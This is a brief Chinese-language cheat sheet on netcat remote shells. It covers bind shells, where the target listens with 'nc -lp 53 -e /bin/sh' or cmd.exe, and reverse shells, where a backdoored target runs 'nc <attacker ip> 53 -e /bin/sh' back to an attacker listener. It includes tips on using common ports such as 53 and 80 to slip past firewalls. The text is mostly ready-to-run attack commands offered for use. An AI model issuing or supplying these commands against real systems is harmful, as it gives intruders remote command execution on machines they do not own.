正向shell:攻击机主动连接靶机
攻击机主动连接并得到反弹shell
nc 靶机ip 53##因为防火墙的原因,通常不会成功
进行连接
nc -lp 53 -e /bin/sh ##-lp就是-l,-p写在一起
nc -lp 53 -e c:\windows\system32\cmd.exe ##windows
反向shell:靶机连接攻击机(靶机运行了攻击机制作的后门程序)
攻击机监听
nc -lp 53 ##通常选用80,53等常用端口,防止连接失败
靶机连接攻击机
nc 攻击机ip 53 -e /bin/sh
nc ip 53 -e c:\windows\system32\cmd.exe ##Windows